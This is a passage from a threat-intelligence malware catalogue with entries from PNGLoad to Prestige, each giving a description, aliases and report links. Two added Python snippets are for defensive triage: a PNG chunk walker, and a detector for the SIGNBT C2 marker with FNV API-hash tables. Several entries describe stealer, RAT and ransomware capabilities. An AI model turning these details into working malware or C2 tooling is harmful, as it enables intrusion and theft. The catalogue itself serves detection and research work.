https://blog.vincss.net/2020/03/re012-phan-tich-ma-doc-loi-dung-dich-COVID-19-de-phat-tan-gia-mao-chi-thi-cua-thu-tuong-Nguyen-Xuan-Phuc.html

https://www.cyber.gov.au/sites/default/files/2019-03/msp_investigation_report.pdf

https://countuponsecurity.com/2018/05/09/malware-analysis-plugx-part-2/

http://blog.jpcert.or.jp/2017/02/plugx-poison-iv-919a.html

https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Tseng-Mem2Img-Memory-Resident-Malware-Detection-via-Convolution-Neural-Network.pdf

https://blogs.blackberry.com/en/2022/10/mustang-panda-abuses-legitimate-apps-to-target-myanmar-based-victims

https://go.recordedfuture.com/hubfs/reports/cta-2023-0808.pdf

https://www.uscc.gov/sites/default/files/2022-02/Adam_Kozy_Testimony.pdf

https://www.recordedfuture.com/redecho-targeting-indian-power-sector/

https://documents.trendmicro.com/assets/txt/earth-berberoka-windows-iocs-2.txt

https://go.contextis.com/rs/140-OCV-459/images/White%20Paper_PlugX%20-%20Payload%20Extraction.pdf

https://www.youtube.com/watch?v=qEwBGGgWgOM

https://blog.viettelcybersecurity.com/p1-chien-dich-cua-nhom-apt-trung-quoc-goblin-panda-tan-cong-vao-viet-nam-loi-dung-dai-dich-covid-19/

https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023

https://www.trendmicro.com/en_us/research/21/a/xdr-investigation-uncovers-plugx-unique-technique-in-apt-attack.html

https://www.proofpoint.com/us/blog/threat-insight/ta416-goes-ground-and-returns-golang-plugx-malware-loader

https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf

https://blog.vincss.net/2022/05/re027-china-based-apt-mustang-panda-might-have-still-continued-their-attack-activities-against-organizations-in-Vietnam.html

https://tracker.h3x.eu/info/290

https://twitter.com/xorhex/status/1399906601562165249?s=20

https://www.secureworks.com/research/threat-profiles/bronze-union

https://news.sophos.com/en-us/2020/11/04/a-new-apt-uses-dll-side-loads-to-killlsomeone/

https://www.mandiant.com/resources/blog/infected-usb-steal-secrets

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf

https://or10nlabs.tech/reverse-engineering-the-new-mustang-panda-plugx-downloader/

https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/

https://www.trendmicro.com/en_us/research/23/b/investigating-the-plugx-trojan-disguised-as-a-legitimate-windows.html

https://blog.eclecticiq.com/mustang-panda-apt-group-uses-european-commission-themed-lure-to-deliver-plugx-malware

https://blog.malwarebytes.com/threat-analysis/2016/08/unpacking-the-spyware-disguised-as-antivirus/

https://silascutler.blogspot.com/2019/11/fresh-plugx-october-2019.html

https://www.recordedfuture.com/chinese-apt-groups-target-afghan-telecommunications-firm/

https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf

https://www.welivesecurity.com/fr/2022/03/25/mustang-pandas-hodur-nouveau-korplug/

https://therecord.media/redecho-group-parks-domains-after-public-exposure/

https://lab52.io/blog/mustang-panda-recent-activity-dll-sideloading-trojans-with-temporal-c2-servers/

https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-blackmatter-lockbit-thor

https://www.contextis.com/en/blog/dll-search-order-hijacking

https://www.recordedfuture.com/chinese-group-calypso-exploiting-microsoft-exchange/

https://insights.oem.avira.com/new-wave-of-plugx-targets-hong-kong/

https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf

https://www.bleepingcomputer.com/news/security/chinas-apt-hackers-move-to-ransomware-attacks/

https://kienmanowar.wordpress.com/2023/01/09/quicknote-another-nice-plugx-sample/

https://web.archive.org/web/20210925164035/https://blog.trendmicro.com/trendlabs-security-intelligence/bkdr_rarstone-new-rat-to-watch-out-for/

https://www.secureworks.com/research/threat-profiles/bronze-atlas

https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader

https://www.lac.co.jp/lacwatch/people/20171218_001445.html

https://therecord.media/indonesian-intelligence-agency-compromised-in-suspected-chinese-hack/

https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia

https://www.sentinelone.com/labs/moshen-dragons-triad-and-error-approach-abusing-security-software-to-sideload-plugx-and-shadowpad/

https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop

https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf

https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia

https://risky.biz/whatiswinnti/

https://www.youtube.com/watch?v=C_TmANnbS2k

https://unit42.paloaltonetworks.com/plugx-variants-in-usbs/

https://medium.com/@Sebdraven/malicious-document-targets-vietnamese-officials-acb3b9d8b80a

https://threatpost.com/chinese-apt-combines-fresh-hodur-rat-with-complex-anti-detection/179084/

https://www.youtube.com/watch?v=r1zAVX_HnJg

http://www.talent-jump.com/article/2020/02/17/CLAMBLING-A-New-Backdoor-Base-On-Dropbox-en/

https://www.sophos.com/en-us/medialibrary/pdfs/technical%20papers/plugx-thenextgeneration.pdf

https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/

https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html

https://blog.talosintelligence.com/2022/05/mustang-panda-targets-europe.html

https://blog.xorhex.com/blog/mustangpandaplugx-1/

https://www.secureworks.com/research/threat-profiles/bronze-firestone

https://decoded.avast.io/threatintel/apt-treasure-trove-avast-suspects-chinese-apt-group-mustang-panda-is-collecting-data-from-burmese-government-agencies-and-opposition-groups/

https://www.bitdefender.com/blog/labs/luminousmoth-plugx-file-exfiltration-and-persistence-revisited

https://blogs.jpcert.or.jp/ja/2022/05/HUILoader.html

https://unit42.paloaltonetworks.com/atoms/shallowtaurus/

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections/

https://go.recordedfuture.com/hubfs/reports/cta-2021-0616.pdf

https://www.proofpoint.com/us/blog/threat-insight/good-bad-and-web-bug-ta416-increases-operational-tempo-against-european

https://marcoramilli.com/2020/03/19/is-apt27-abusing-covid-19-to-attack-people/

https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf

https://securelist.com/apt-trends-report-q3-2020/99204/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lancefly-merdoor-zxshell-custom-backdoor

PNGLoad

According to ESET Research, PNGLoad is a second-stage payload deployed by Worok on compromised systems and loaded either by CLRLoad or PowHeartBeat. PNGLoad has capabilities to download and execute additional payloads from a C&C server, which is likely how the attackers have deployed PNGLoad on systems compromised with PowHeartBeat. PNGLoad is a loader that uses bytes from PNG files to create a payload to execute. It is a 64-bit .NET executable - obfuscated with .NET Reactor - that masquerades as legitimate software.
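The entry above says only that PNGLoad builds its payload from bytes taken out of PNG files, not how those bytes are encoded, so the first triage step a practitioner has is structural: does the image carry data the format does not account for? The Python walker below is an added example (not ESET's or the Worok operators' code, and not a description of PNGLoad's own encoding). It parses a PNG chunk by chunk, verifies every chunk CRC, reports chunk types outside the PNG specification and counts bytes that follow IEND. The sample image, the "pYLd" chunk name and the trailing "MZ" bytes are constructed inline for the example.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"

# Chunk types defined by the PNG specification (critical and ancillary).
# Anything else is not proof of malice, but it is exactly where a loader
# could park data, so it deserves a look.
STANDARD_CHUNKS = {
    b"IHDR", b"PLTE", b"IDAT", b"IEND", b"tRNS", b"cHRM", b"gAMA", b"iCCP",
    b"sBIT", b"sRGB", b"tEXt", b"zTXt", b"iTXt", b"bKGD", b"hIST", b"pHYs",
    b"sPLT", b"tIME", b"eXIf",
}


def walk_png(data: bytes) -> dict:
    """Walk a PNG chunk by chunk and return triage findings.

    The result holds the parsed (type, length, offset) tuples, a list of
    human-readable findings and the number of bytes that follow IEND.
    """
    findings, chunks = [], []
    if not data.startswith(PNG_SIGNATURE):
        return {"chunks": chunks, "findings": ["bad PNG signature"], "trailing": len(data)}
    pos = len(PNG_SIGNATURE)
    saw_iend = False
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        crc_field = data[pos + 8 + length:pos + 12 + length]
        if len(body) < length or len(crc_field) < 4:
            findings.append(f"truncated chunk {ctype!r} at offset {pos}")
            return {"chunks": chunks, "findings": findings, "trailing": 0}
        (stored_crc,) = struct.unpack(">I", crc_field)
        if stored_crc != (zlib.crc32(ctype + body) & 0xFFFFFFFF):
            findings.append(f"CRC mismatch in {ctype!r} at offset {pos}")
        if ctype not in STANDARD_CHUNKS:
            findings.append(f"non-standard chunk {ctype!r} ({length} bytes) at offset {pos}")
        chunks.append((ctype, length, pos))
        pos += 12 + length
        if ctype == b"IEND":
            saw_iend = True
            break
    trailing = len(data) - pos
    if not saw_iend:
        findings.append("no IEND chunk")
    if trailing > 0:
        where = "after IEND" if saw_iend else "after last parsed chunk"
        findings.append(f"{trailing} bytes {where}")
    return {"chunks": chunks, "findings": findings, "trailing": trailing}


def png_chunk(ctype: bytes, body: bytes) -> bytes:
    """Serialize one chunk: length, type, data, CRC over type + data."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def make_sample_png(extra_chunks=(), trailing=b"") -> bytes:
    """Constructed sample: a valid 1x1 8-bit grayscale PNG, optionally with
    extra chunks inserted before IDAT and bytes appended after IEND."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)  # 1x1, depth 8, gray
    idat = zlib.compress(b"\x00\x00")                     # filter byte + one pixel
    parts = [PNG_SIGNATURE, png_chunk(b"IHDR", ihdr)]
    parts += [png_chunk(t, b) for t, b in extra_chunks]
    parts += [png_chunk(b"IDAT", idat), png_chunk(b"IEND", b"")]
    return b"".join(parts) + trailing


if __name__ == "__main__":
    sample = make_sample_png(extra_chunks=[(b"pYLd", b"\x90" * 64)],
                             trailing=b"MZ" + bytes(30))
    for finding in walk_png(sample)["findings"]:
        print(finding)
```

The walker only catches structural abuse (private chunks, appended blobs, tampered CRCs). A loader that reads its bytes out of pixel values leaves the chunk list perfectly valid; for that case compare the decompressed IDAT size against the IHDR dimensions and look at the least-significant-bit distribution of the pixels instead.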

The tag is: misp-galaxy:malpedia="PNGLoad"

PNGLoad is also known as:

Table 4280. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.png_load

https://www.welivesecurity.com/2022/09/06/worok-big-picture/

PocoDown

Uses the POCO C++ cross-platform library and XOR-based string obfuscation; shares SSL library code and strings with Xtunnel and infrastructure with X-Agent. Probably in use since mid-2018.

The tag is: misp-galaxy:malpedia="PocoDown"

PocoDown is also known as:

  • Blitz

  • PocoDownloader

Table 4281. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.pocodown

https://threatvector.cylance.com/en_us/home/inside-the-apt28-dll-backdoor-blitz.html

https://threatvector.cylance.com/en_us/home/flirting-with-ida-and-apt28.html

https://twitter.com/cyb3rops/status/1129653190444703744

poisonplug

According to FireEye, POISONPLUG is a highly obfuscated modular backdoor with plug-in capabilities. The malware is capable of registry or service persistence, self-removal, plug-in execution, and network connection forwarding. POISONPLUG has been observed using social platforms to host encoded C&C commands.

The tag is: misp-galaxy:malpedia="poisonplug"

poisonplug is also known as:

  • Barlaiy

Table 4282. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.poisonplug

https://www.fireeye.com/blog/threat-research/2019/10/lowkey-hunting-for-the-missing-volume-serial-id.html

https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf

https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko

https://securelist.com/apt-trends-report-q3-2020/99204/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage

https://content.fireeye.com/apt-41/rpt-apt41/

Poison Ivy

The tag is: misp-galaxy:malpedia="Poison Ivy"

Poison Ivy is also known as:

  • SPIVY

  • pivy

  • poisonivy

Table 4283. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.poison_ivy

http://blogs.360.cn/post/APT_C_01_en.html

https://vb2020.vblocalhost.com/uploads/VB2020-20.pdf

https://unit42.paloaltonetworks.com/atoms/crawling-taurus/

https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/blob/master/2016/2016.04.26.New_Poison_Ivy_Activity_Targeting_Myanmar_Asian_Countries/New%20Poison%20Ivy%20Activity%20Targeting%20Myanmar%2C%20Asian%20Countries.pdf

https://www.fortinet.com/blog/threat-research/pivnoxy-and-chinoxy-puppeteer-analysis

https://vb2020.vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf

https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html

https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf

https://www.recordedfuture.com/china-linked-ta428-threat-group

https://engineers.ffri.jp/entry/2022/11/30/141346

https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-pulling-pkplug-adversary-playbook-long-standing-espionage-activity-chinese-nation-state-adversary/

http://blog.fortinet.com/2017/08/23/deep-analysis-of-new-poison-ivy-variant

http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf

https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf

https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/

https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/

https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-GuPan.pdf

https://vblocalhost.com/uploads/VB2020-20.pdf

https://researchcenter.paloaltonetworks.com/2016/04/unit42-new-poison-ivy-rat-variant-targets-hong-kong-pro-democracy-activists/

https://blog.bushidotoken.net/2022/07/space-invaders-cyber-threats-that-are.html

https://www.secureworks.com/research/threat-profiles/aluminum-saratoga

https://blog.fortinet.com/2017/09/15/deep-analysis-of-new-poison-ivy-plugx-variant-part-ii

https://community.riskiq.com/article/56fa1b2f

https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf

https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf

https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf

https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/analysing-a-recent-poison-ivy-sample/

https://us-cert.cisa.gov/ncas/alerts/aa20-275a

https://www.slideshare.net/StefanoMaccaglia/bsides-ir-in-heterogeneous-environment

https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers

https://attack.mitre.org/groups/G0011

https://www.secureworks.com/research/threat-profiles/bronze-union

https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/

https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html

https://www.secureworks.com/research/threat-profiles/bronze-firestone

https://www.proofpoint.com/us/threat-insight/post/chinese-apt-operation-lagtime-it-targets-government-information-technology

https://blogs.jpcert.or.jp/ja/2022/05/HUILoader.html

https://unit42.paloaltonetworks.com/atoms/shallowtaurus/

https://www.welivesecurity.com/2021/02/01/operation-nightscout-supply-chain-attack-online-gaming-asia/

https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2011/the_nitro_attacks.pdf

https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html

https://researchcenter.paloaltonetworks.com/2014/09/recent-watering-hole-attacks-attributed-apt-group-th3bug-using-poison-ivy/

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections/

https://www.secureworks.com/research/threat-profiles/bronze-keystone

https://go.recordedfuture.com/hubfs/reports/cta-2021-0616.pdf

https://lab52.io/blog/icefog-apt-group-abusing-recent-conflict-between-iran-and-eeuu/

https://www.youtube.com/watch?v=1WfPlgtfWnQ

https://www.secureworks.com/research/threat-profiles/bronze-riverside

Polyglot

The tag is: misp-galaxy:malpedia="Polyglot"

Polyglot is also known as:

Table 4288. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.polyglot_ransom

https://securelist.com/blog/research/76182/polyglot-the-fake-ctb-locker/

Pony

According to KnowBe4, Pony Stealer is a password stealer that can decrypt or unlock passwords for over 110 different applications including VPN, FTP, email, instant messaging, web browsers and much more. Pony Stealer is very dangerous and once it infects a PC it will turn the device into a botnet, allowing it to use the PCs it infects to infect other PCs.

The tag is: misp-galaxy:malpedia="Pony"

Pony is also known as:

  • Fareit

  • Siplog

Table 4290. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.pony

https://github.com/nyx0/Pony

https://i.blackhat.com/asia-21/Thursday-Handouts/as21-Taniguchi-How-Did-The-Adversaries-Abusing-The-Bitcoin-Blockchain-Evade-Our-Takeover.pdf

https://www.youtube.com/watch?v=EyDiIAtdI

https://www.secureworks.com/research/threat-profiles/gold-essex

https://www.knowbe4.com/pony-stealer

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/

http://www.secureworks.com/research/threat-profiles/gold-essex

https://www.youtube.com/watch?v=y8Z9KnL8s8s

https://www.uperesia.com/analysis-of-a-packed-pony-downloader

https://research.checkpoint.com/2019/select-code_execution-from-using-sqlite/

https://www.youtube.com/watch?v=42yldTQ-fWA

http://www.secureworks.com/research/threat-profiles/gold-galleon

https://www.mcafee.com/us/resources/reports/rp-quarterly-threats-jun-2017.pdf

https://int0xcc.svbtle.com/practical-threat-hunting-and-incidence-response-a-case-of-a-pony-malware-infection

https://www.secureworks.com/research/threat-profiles/gold-evergreen

https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf

https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/

https://www.secureworks.com/research/threat-profiles/gold-galleon

https://www.secureworks.com/research/gold-galleon-how-a-nigerian-cyber-crew-plunders-the-shipping-industry

https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf

http://www.secureworks.com/research/threat-profiles/gold-evergreen

https://intel471.com/blog/a-brief-history-of-ta505

Popcorn Time

The tag is: misp-galaxy:malpedia="Popcorn Time"

Popcorn Time is also known as:

Table 4294. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.popcorn_time

PoshC2

PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming, post-exploitation and lateral movement.

PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools, allowing an extendible and flexible C2 framework. Out of the box, PoshC2 comes with PowerShell/C# and Python3 implants, with payloads written in PowerShell v2 and v4, C++ and C# source code, a variety of executables, DLLs and raw shellcode in addition to a Python3 payload. These enable C2 functionality on a wide range of devices and operating systems, including Windows, *nix and OSX.

The tag is: misp-galaxy:malpedia="PoshC2"

PoshC2 is also known as:

Table 4298. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.poshc2

https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html

https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f

https://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/

https://labs.nettitude.com/blog/detecting-poshc2-indicators-of-compromise/

https://www.secureworks.com/research/threat-profiles/cobalt-trinity

https://redcanary.com/blog/getsystem-offsec/

https://www.fireeye.com/blog/threat-research/2020/07/scandalous-external-detection-using-network-scan-data-and-automation.html

https://paper.seebug.org/1301/

https://5851803.fs1.hubspotusercontent-na1.net/hubfs/5851803/Russian%20Ransomware%20C2%20Network%20Discovered%20in%20Censys%20Data.pdf

http://www.rewterz.com/rewterz-news/rewterz-threat-alert-iranian-apt-uses-job-scams-to-lure-targets

https://ti.dbappsecurity.com.cn/blog/articles/2021/09/06/operation-maskface/

https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf

https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf

https://github.com/jeFF0Falltrades/IoCs/blob/master/APT/poshc2_apt_33.md

https://github.com/nettitude/PoshC2_Python/

https://censys.com/russian-ransomware-c2-network-discovered-in-censys-data/

PostNapTea

PostNapTea, aka SIGNBT, is an HTTP(S) RAT written as a complex object-oriented project.

In 2022-2023 it was deployed against targets such as a newspaper organization, an agriculture-related entity and a software vendor. Initial access was usually achieved by exploiting vulnerabilities in software widely used in South Korea.

It collects various information about the victim’s computer, such as computer name, product name, OS details, system uptime, CPU information, system locale, time zone, network status, and the malware configuration.

PostNapTea uses AES for encryption and decryption of network traffic. A constant prefix, SIGNBT, occurs in its HTTP POST requests. The prefix is concatenated with 2 characters that identify the communication stage:

  • LG: logging into the C&C server

  • KE: acknowledging the successful login to the C&C

  • FI: sending the status of a failed operation

  • SR: sending the status of a successful operation

  • GC: getting the next command

There are five classes that represent command groups:

  • CCButton: file manipulation and screen capturing

  • CCBitmap: network commands, implementing the functionality of Windows commands often abused by attackers, such as sc, reg, arp, net, ver, wmic, ping, whoami, netstat, tracert, lookup, ipconfig, systeminfo, and netsh advfirewall

  • CCComboBox: file system management

  • CCList: process management

  • CCBrush: control of the malware itself

It stores its configuration in JSON format. It resolves the Windows APIs it requires at runtime via the Fowler–Noll–Vo (FNV) hash function.

Its internal name in the version-information resource is usually ppcsnap.dll or pconsnap.dll, which loosely inspired its code name.
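Two details above are directly actionable: the SIGNBT marker with its two-character stage code is a network detection hook, and the FNV-hashed API resolution is what an analyst has to undo when reading a sample. The Python below is an added example, not Kaspersky's, ESET's or the operators' code. It classifies request payloads by stage code and builds a hash-to-name table so hashes lifted from a sample can be resolved. Two assumptions are labelled in the code: the entry does not say where inside the POST the prefix sits, so the whole payload is searched, and it does not name the FNV variant, so both 32-bit FNV-1 and FNV-1a are provided. The request payloads and the API name list are constructed for the example.

```python
from typing import Optional

# Stage codes listed in the entry: two ASCII characters appended to the
# constant prefix. Meanings are paraphrased from the description.
SIGNBT_PREFIX = b"SIGNBT"
SIGNBT_STAGES = {
    "LG": "login to the C&C server",
    "KE": "login acknowledged by the C&C",
    "FI": "status of a failed operation",
    "SR": "status of a successful operation",
    "GC": "request for the next command",
}


def classify_signbt(payload: bytes) -> Optional[tuple]:
    """Look for SIGNBT + 2-char stage code in a request payload.

    Returns (stage, meaning); meaning is None for a code the entry does not
    list. Returns None when the prefix is absent. ASSUMPTION: the entry does
    not say where the prefix sits, so the whole payload is searched.
    """
    idx = payload.find(SIGNBT_PREFIX)
    if idx < 0:
        return None
    stage = payload[idx + 6:idx + 8].decode("ascii", errors="replace")
    return stage, SIGNBT_STAGES.get(stage)


def triage_posts(payloads) -> list:
    """Return (index, stage, meaning) for every payload carrying the marker."""
    hits = []
    for i, p in enumerate(payloads):
        hit = classify_signbt(p)
        if hit is not None:
            hits.append((i, hit[0], hit[1]))
    return hits


# --- FNV hashing of API names -------------------------------------------
# ASSUMPTION: the entry says APIs are resolved via FNV but not which variant,
# so both 32-bit forms are here; use the one that reproduces a sample's constants.
FNV_32_PRIME = 0x01000193
FNV_32_OFFSET = 0x811C9DC5


def fnv1_32(data: bytes) -> int:
    """FNV-1: multiply, then XOR each byte."""
    h = FNV_32_OFFSET
    for b in data:
        h = (h * FNV_32_PRIME) & 0xFFFFFFFF
        h ^= b
    return h


def fnv1a_32(data: bytes) -> int:
    """FNV-1a: XOR each byte, then multiply."""
    h = FNV_32_OFFSET
    for b in data:
        h ^= b
        h = (h * FNV_32_PRIME) & 0xFFFFFFFF
    return h


def build_hash_table(names, hash_fn=fnv1a_32) -> dict:
    """Precompute hash -> API name so hashes found in a sample can be resolved."""
    return {hash_fn(n.encode("ascii")): n for n in names}


# Export names a RAT with the capabilities above would plausibly need
# (illustrative list constructed for the example, not taken from a sample).
API_NAMES = [
    "LoadLibraryA", "GetProcAddress", "VirtualAlloc", "CreateProcessW",
    "CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW",
    "WinHttpOpen", "WinHttpSendRequest", "BitBlt", "GetSystemTime",
]

# Constructed request payloads standing in for captured POST bodies.
SAMPLE_PAYLOADS = [
    b"SIGNBTLG" + bytes(16),   # login
    b"SIGNBTGC" + bytes(16),   # poll for a command
    b"SIGNBTZZ" + bytes(16),   # marker present, unlisted stage code
    b"id=42&data=deadbeef",    # unrelated traffic
]

if __name__ == "__main__":
    for idx, stage, meaning in triage_posts(SAMPLE_PAYLOADS):
        print(f"payload {idx}: stage {stage} -> {meaning}")
    table = build_hash_table(API_NAMES)
    for name in ("VirtualAlloc", "WinHttpOpen"):
        h = fnv1a_32(name.encode())
        print(f"{h:#010x} -> {table[h]}")
```

Because the traffic is AES-encrypted, the marker is only visible where TLS is terminated or the request body is in the clear; the hash table is the more durable artefact, since renaming the binary does not change the constants it resolves.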

The tag is: misp-galaxy:malpedia="PostNapTea"

PostNapTea is also known as:

  • SIGNBT

Table 4300. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.postnaptea

https://www.virusbulletin.com/uploads/pdf/conference/vb2023/papers/Lazarus-campaigns-and-backdoors-in-2022-2023.pdf

https://securelist.com/unveiling-lazarus-new-campaign/110888/

Povlsomware

According to Trend Micro, Povlsomware (Ransom.MSIL.POVLSOM.THBAOBA) is a proof-of-concept (POC) ransomware first released in November 2020 which, according to its GitHub page, is used to “securely” test the ransomware protection capabilities of security vendor products.

The tag is: misp-galaxy:malpedia="Povlsomware"

Povlsomware is also known as:

Table 4302. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.povlsomware

https://youtu.be/oYLs6wuoOfg

https://www.trendmicro.com/en_us/research/21/c/povlsomware-ransomware-features-cobalt-strike-compatibility.html

POWERBAND

.NET variant of ps1.powerton.

The tag is: misp-galaxy:malpedia="POWERBAND"

POWERBAND is also known as:

Table 4304. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.powerband

https://blog.telsy.com/meeting-powerband-the-apt33-net-powerton-variant/

powerkatz

The tag is: misp-galaxy:malpedia="powerkatz"

powerkatz is also known as:

Table 4307. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.powerkatz

https://blog.yoroi.company/research/the-arsenal-behind-the-australian-parliament-hack/

PowerLoader

The tag is: misp-galaxy:malpedia="PowerLoader"

PowerLoader is also known as:

Table 4308. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.powerloader

https://www.malwaretech.com/2013/08/powerloader-injection-something-truly.html

PowerPool

The tag is: misp-galaxy:malpedia="PowerPool"

PowerPool is also known as:

Table 4309. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.powerpool

https://www.welivesecurity.com/2018/09/05/powerpool-malware-exploits-zero-day-vulnerability/

prb_backdoor

The tag is: misp-galaxy:malpedia="prb_backdoor"

prb_backdoor is also known as:

Table 4313. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.prb_backdoor

https://sec0wn.blogspot.com/2018/05/prb-backdoor-fully-loaded-powershell.html

Predator The Thief

Predator is a feature-rich information stealer. It is sold on hacking forums as a bundle which includes a payload builder and a command-and-control web panel. It is able to grab passwords from browsers, replace cryptocurrency wallets, and take photos from the web camera. It is developed using a modular approach so that criminals may add more sophisticated tools on top of it.

The tag is: misp-galaxy:malpedia="Predator The Thief"

Predator The Thief is also known as:

Table 4314. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.predator

https://fumik0.com/2019/12/25/lets-play-again-with-predator-the-thief/

https://www.secureworks.com/research/threat-profiles/gold-galleon

https://securelist.com/a-predatory-tale/89779

https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/

https://fumik0.com/2018/10/15/predator-the-thief-in-depth-analysis-v2-3-5/

https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://www.fortinet.com/blog/threat-research/predator-the-thief-new-routes-delivery.html

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/

https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_4_ogawa-niseki_en.pdf

Prestige

According to PCrisk, Prestige is ransomware - malware that prevents victims from accessing (opening) their files by encrypting them. Additionally, Prestige appends the ".enc" extension to filenames and drops the "README" file containing a ransom note. An example of how this ransomware modifies filenames: it renames "1.jpg" to "1.jpg.enc", "2.png" to "2.png.enc", and so forth.

The tag is: misp-galaxy:malpedia="Prestige"

Prestige is also known as:

Table 4315. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.prestige

https://blogs.microsoft.com/on-the-issues/2022/12/03/preparing-russian-cyber-offensive-ukraine/

https://www.microsoft.com/security/blog/2022/10/14/new-prestige-ransomware-impacts-organizations-in-ukraine-and-poland/

